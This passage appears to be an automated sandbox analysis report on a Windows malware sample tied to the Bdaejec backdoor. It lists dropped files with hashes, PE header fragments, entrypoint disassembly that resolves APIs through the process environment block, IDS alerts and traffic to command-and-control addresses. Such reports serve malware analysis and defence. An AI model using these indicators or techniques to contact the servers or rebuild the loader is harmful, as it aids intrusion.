Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

Process:	C:\Users\user\AppData\Local\Temp\VSFdoO.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\1BFE601E.exe

Process:	C:\Users\user\AppData\Local\Temp\VSFdoO.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\VSFdoO.exe

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_48.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031075575407894
Encrypted:	false
SSDEEP:	384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
MD5:	F7D21DE5C4E81341ECCD280C11DDCC9A
SHA1:	D4E9EF10D7685D491583C6FA93AE5D9105D815BD
SHA-256:	4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
SHA-512:	E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: LisectAVT_2403002B_470.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_482.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_498.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_498.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_50.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_61.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_65.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_72.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_7.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_72.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk

Process:	C:\Windows\SGuard.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Tue Oct 3 10:50:01 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2356
Entropy (8bit):	3.576995670621103
Encrypted:	false
SSDEEP:	48:8SLdpT63ERYrnvDdAKRkdAadAKR+/KRllygP:8SbEMly
MD5:	E6D21A534443C413527D797090EC5DB8
SHA1:	90731DDFC385AB53786906D089B190057FCD6591
SHA-256:	E0F7F9C24C524C67A301779AE46224B8F4BD58ED0F0030A2C5541E61E3AC27E2
SHA-512:	9DAEE07D180014AF2194569325083CF40B171A380553CD98A97304E5CA5C07FF13A43B5C47747135F7BAE6A1E7BCBB25263C135D5FD358B3E93990E9E825DAC2
Malicious:	false
Preview:	L..................F.@.. ......,....Tb.........q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....CW}W..PROGRA~1..t......O.ICW}W....B...............J.....7...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VCW.W....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VCW.V....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VCW.W..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VCW.W..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.G.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n...w.w

C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk

Process:	C:\Windows\SGuard.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 5 21:41:46 2021, mtime=Tue Oct 3 10:48:05 2023, atime=Thu Aug 5 05:45:01 2021, length=3311504, window=hide
Category:	dropped
Size (bytes):	2416
Entropy (8bit):	3.665420467091212
Encrypted:	false
SSDEEP:	48:8UZndO5fLswOnzTdRdZdLXuHj0PkZyl7:88xuD0PkZy
MD5:	37643BAE4E3B14CB16AE05FC891DDD95
SHA1:	51EA1852843B0B62CFE57B73D1446A62E4C2E7FC
SHA-256:	21A72C218699514DE6094918F9368C741EE36D5F96DB3946544D7E414740E377
SHA-512:	C88DBA365DBEBD82F1191CB7D69B947066D8933815B856DE4EBF9FA087D3DD9445E6FEAF0C27EA2338D911DBD74C412473A1FE3D4C3B8621F5087614E33EED76
Malicious:	false
Preview:	L..................F.@.. .....\|.K.....x......zj.....2.....................1....P.O. .:i.....+00.../C:\.....................1.....CW.X..PROGRA~2.........O.ICW.X....................V.......E.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....\.1.....CW.?..MICROS~1..D......(Ux.CW.U..........................w.o.M.i.c.r.o.s.o.f.t.....N.1.....CW.?0.Edge..:.......S8.CW.U...........................f .E.d.g.e.....`.1.....CW.H0.APPLIC~1..H.......S8.CW.U...........................L).A.p.p.l.i.c.a.t.i.o.n.....`.2...2..S.5 .msedge.exe..F.......S8.CW.V...........................t..m.s.e.d.g.e...e.x.e.......k...............-.......j............F.......C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe....B.r.o.w.s.e. .t.h.e. .w.e.b.N.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.1.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.

C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk

Process:	C:\Windows\SGuard.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Tue Oct 3 09:48:42 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2397
Entropy (8bit):	3.6090694468662234
Encrypted:	false
SSDEEP:	48:8S7dBT6DpRYrnvs4dAKRkdAadAKR+/KRlay8Ec:8SnhOayd
MD5:	8C50330A714940F48B261FFCB154A6C5
SHA1:	001EF6CA8668EB044CE8250634E7AB56C207C5EE
SHA-256:	DEF6728849F30A161CCB95483EE2301B9EEFEFD6CBF97710ECA09297F76912EE
SHA-512:	E2F1BD7403F7D466126E918EAA701F63CCDBE620F7BD3EC139E873097538CB12F8AFB1A6DD121923F15C32A1A99230DCB44AC199CC75E3005368A9BE7D7CFE56
Malicious:	false
Preview:	L..................F.@.. ......,.....=.,.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....CW.V..PROGRA~1..t......O.ICW.V....B...............J.....p+j.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VCW.V....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VCW.V....M.....................G-..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VCW.V..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VCW.V..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.M.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk

Process:	C:\Windows\SGuard.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Thu Sep 8 02:07:23 2022, mtime=Tue Oct 3 10:02:25 2023, atime=Thu Sep 8 02:07:23 2022, length=834512, window=hide
Category:	dropped
Size (bytes):	1390
Entropy (8bit):	4.593261442477821
Encrypted:	false
SSDEEP:	24:8C7+MdSwfiEMhn/AIkcSgdCEMBCegYJdcaiYHtIX/8UqyFm:8CTdlfivhnIXgdCvBCdowAIX/wyF
MD5:	1CE9F20F82EB0512D0F0C2130E0492C3
SHA1:	E32D95B1409C3431F8BF8F97BA1E4980B0E90F30
SHA-256:	723FC7837587763FAE7F14AA6751AFABD12F79B366C70AC90B0056A9E5EADBC0
SHA-512:	2A9EA35A6C8DF8F9CEA3DA335DB643CD4B64058F3BA307C48F667CEACCEBB588204CC8EF68B0C1960F60146EE9D9D6A574ACD88CF2C55AA633EECF9341887CBD
Malicious:	false
Preview:	L..................F.... ....L..0...7........L..0...............................P.O. .:i.....+00.../C:\.....................1.....CW}W..PROGRA~1..t......O.ICW}W....B...............J.....7...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1.....(Um...INTERN~1..T......O.ICW.V...........................b..I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r.....f.2....(U.. .iexplore.exe..J......(U..CW$V.....m..........\|.........$.k.i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............F.......C:\Program Files\Internet Explorer\iexplore.exe..&.@.".%.w.i.n.d.i.r.%.\.S.y.s.t.e.m.3.2.\.i.e.4.u.i.n.i.t...e.x.e.".,.-.7.3.2.G.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r.\.i.e.x.p.l.o.r.e...e.x.e...%.H.O.M.E.D.R.I.V.E.%.%.H.O.M.E.P.A.T.H.%...w.w.w...2.3.4.5...c.o.m./.?.3.1.1.3.3.-.4.0.1.5.........&................c^...NI..e.2.......`.......X.......desktop-aget0tr..hT..CrF.f4... ..$.(.a......).;.hT..Cr

C:\Users\user\AppData\Roaming\winoshelper.dll

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_48.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	1133056
Entropy (8bit):	7.775666202462079
Encrypted:	false
SSDEEP:	24576:0yM4Tfbs603xoJQ7GSYMMHF9SGCV19TgumbhlIWDM1A:FTfT0qJ9SxMHDXCPlgumbAWH
MD5:	8371EA1D8636CBC2A62A9C10FA395E9F
SHA1:	72AA3E37A168A5F88E894CBA1AB6EB17AF52EDC2
SHA-256:	E6C47B8DBAD042BEC1E068C7AA25643235C85BED2BA4F2716E5DD6AFBB241B1F
SHA-512:	6F05A663D7F51B1F8C6BC008B45A25C67816F8E860F8F480B43EEF37DB9D7E843360E6BA8CD3D2C7FF7D9F0113053D158CB5CBE59A180C3176B6A09EA593AC16
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.C...-...-...-.x.!...-...#...-.l.)...-...p...-...,.^.-.5.&.'.-...-...-...&...-...)...-.Rich..-.........................PE..L...,..e...........!.....P..............................................................................................\...................................\.......................................................................................UPX0....................................UPX1.....P.......B..................@...UPX2.................F..............@......................................................................................................................................................................................................................................................................................................................................................................................4.01.UPX!....

C:\Windows\SGuard.exe

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1119744
Entropy (8bit):	7.7679275698490615
Encrypted:	false
SSDEEP:	24576:iPaFbzfxmmO7CwJCGwqqiL9b6WmGeSwT/5S9Kae:tx8OJGBqCbNjeSwTU4
MD5:	116A29D2FB23771FC0EF863387C51933
SHA1:	E8F85EEBE3D74E6C792288E4793DC53762147A41
SHA-256:	CFBFDB6E8DB54B03E91AF1D3542A920635E1C74622559B0D8B32FB606A6F84A7
SHA-512:	73E09C54A7CCBEB718A8C8C7D1A9FDE97ABBC4D263CCFF3CB5913A3D903F2D3FE65F27E66D709F1113C666DBED6D9682091EC79F89E008524BDEAD471BDEE776
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......W%.<.D.o.D.o.D.oX<.n.D.oX<.n.D.o\8io.D.o\8.n.D.o\8.n.D.o\8.nLD.oX<.n.D.oX<.n.D.o.8.n.D.o.D.o@E.oX<.n.D.o.1.n.D.o.8.n.D.o.8.n.D.o.8ko.D.o.D.o.D.o.8.n.D.oRich.D.o........PE..d.....e.........."....".........0G..EV..@G....@.............................`X...........`..................................................SX......PV.......R.\|............UX.$............................HV.(....IV.@...........................................UPX0.....0G.............................UPX1.........@G.....................@....rsrc........PV.....................@......................................................................................................................................................................................................................................................................................................................4.01.UPX!.$..

C:\Windows\appcompat\Programs\Amcache.hve

Process:	C:\Users\user\AppData\Local\Temp\VSFdoO.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466007856388039
Encrypted:	false
SSDEEP:	6144:XIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNxdwBCswSbn:YXD94+WlLZMM6YFH/+n
MD5:	6729620C3F7C68A49DD8594FF62ABE76
SHA1:	FE076CBB2F21576479954D00E725E16C02B53DFD
SHA-256:	B166DB19714C7B485659F1B080EC538099DA184F0B2C646208A3B18E914EF25D
SHA-512:	29AAB409887D911DFCB2A992CF7C0FE99E857F20E4D14BC12DA2FD948E83892A3ECDF0E91BD040DBC88EEACFF0CACB6B9973C21B3BE9FD3CD55F896B7CB46BF7
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...Uy..................................................................................................................................................................................................................................................................................................................................................a........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Entropy (8bit):	7.9944359340532
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LisectAVT_2403002B_48.exe
File size:	1'133'568 bytes
MD5:	eead4e7646c126c720e4ed71a65a57e1
SHA1:	41e4415cba94a25f161b3481a72aa3ff3d862358
SHA256:	fa62c037474b2042950a0c4ee438e6fda99ab4a62ea31afd29cb78b46ac24d34
SHA512:	a652fb85d9d6786d9d914ff292655a1a0de379a0191d2ab67ec0dae0e5bcad329a85f88dee10be4c44292f34778a68d368c9b227bcf9391b609c542ad61a232b
SSDEEP:	24576:459WznCx4VklRKwWnaZPk+0V1TsaEvWV/kXF0V5YH+:45gzG4ViHZOsWs6VuH
TLSH:	013523D6D7E1ED4BC1C9D8F1B2658CB31B2E17140BBA3B79209AD4DE598A197F80C08C
File Content Preview:	MZ@.....................................!..L.!Win32 .EXE...$@...PE..L...F..e.................j...r...............@....@..........................`..................................................L........!.................................................

File Icon


Icon Hash:	9eb3c9c909ca8b9e

Static PE Info

General

Entrypoint:	0x531000
Entrypoint Section:	Tu3
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x65D89146 [Fri Feb 23 12:36:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1bf257ade66d639c4f4d9030729290a2

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 64465356h
mov dword ptr [ebp-44h], 652E4F6Fh
mov dword ptr [ebp-40h], 00006578h
mov dword ptr [ebp-3Ch], 00000000h
call 00007FB2B4CE7CB5h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFFFBEDBh
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007FB2B4CE7DFEh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007FB2B4CE7D04h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007FB2B4CE7CFBh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x12d000	0x14c	.MPRESS2
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12e000	0x211c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x12d078	0x28	.MPRESS2
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.MPRESS1	0x1000	0x12c000	0x10d800	cb4d04236c79a38a742dba09df39c055	False	1.000313442138219	data	7.999833456794264	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.MPRESS2	0x12d000	0xcb6	0xe00	67e9ff663d269c9e5c661bde607f11ee	False	0.5373883928571429	data	5.721564333416146	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x12e000	0x211c	0x2200	dfbf5319d38faa59f68e537dff927c93	False	0.3135340073529412	data	5.139665312198854	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Tu3	0x131000	0x5000	0x4200	cbb93c7fe3db42b8fb8befb091037076	False	0.7775213068181818	data	6.934576836261578	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x12e078	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304	Chinese	China	0.3640724946695096
RT_ICON	0x12ef48	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024	Chinese	China	0.506768953068592
RT_ICON	0x12f818	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256	Chinese	China	0.6813583815028902
RT_GROUP_ICON	0x12fdc0	0x30	data	Chinese	China	0.875
RT_MANIFEST	0x12fe30	0x2ea	XML 1.0 document, ASCII text, with CRLF line terminators	Chinese	China	0.5268096514745308

Imports

DLL	Import
KERNEL32.DLL	GetModuleHandleA, GetProcAddress
ADVAPI32.dll	OpenServiceA
SHELL32.dll	SHGetSpecialFolderPathW
MSVCRT.dll	atoi
USER32.dll	wsprintfA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T12:00:06.397472+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49737	20.114.59.183	192.168.2.4
2024-07-25T11:59:27.936291+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49730	799	192.168.2.4	44.221.84.105
2024-07-25T12:00:50.771932+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49743	20.114.59.183	192.168.2.4
2024-07-25T11:59:27.472112+0200	UDP	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	50652	53	192.168.2.4	1.1.1.1
2024-07-25T12:00:12.790180+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49742	443	192.168.2.4	52.168.117.173

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 11:59:27.494664907 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 25, 2024 11:59:27.500339031 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 25, 2024 11:59:27.503941059 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 25, 2024 11:59:27.506061077 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 25, 2024 11:59:27.511260033 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 25, 2024 11:59:27.936146975 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 25, 2024 11:59:27.936290979 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 25, 2024 11:59:27.936295986 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 25, 2024 11:59:27.936364889 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 25, 2024 11:59:27.938086033 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 25, 2024 11:59:27.943507910 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 25, 2024 12:02:28.364252090 CEST	49744	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:28.371787071 CEST	19999	49744	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:28.371867895 CEST	49744	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:28.373641014 CEST	49744	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:28.381577969 CEST	19999	49744	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:28.381592989 CEST	19999	49744	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:28.645642042 CEST	49744	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:28.694094896 CEST	19999	49744	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:28.853899956 CEST	19999	49744	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:28.853965044 CEST	49744	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:29.245162964 CEST	49745	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:29.252357960 CEST	19999	49745	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:29.252453089 CEST	49745	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:29.252641916 CEST	49745	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:29.260554075 CEST	19999	49745	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:29.261081934 CEST	19999	49745	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:29.666696072 CEST	49745	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:29.713999033 CEST	19999	49745	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:29.724936008 CEST	19999	49745	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:29.724994898 CEST	49745	19999	192.168.2.4	5.75.158.61
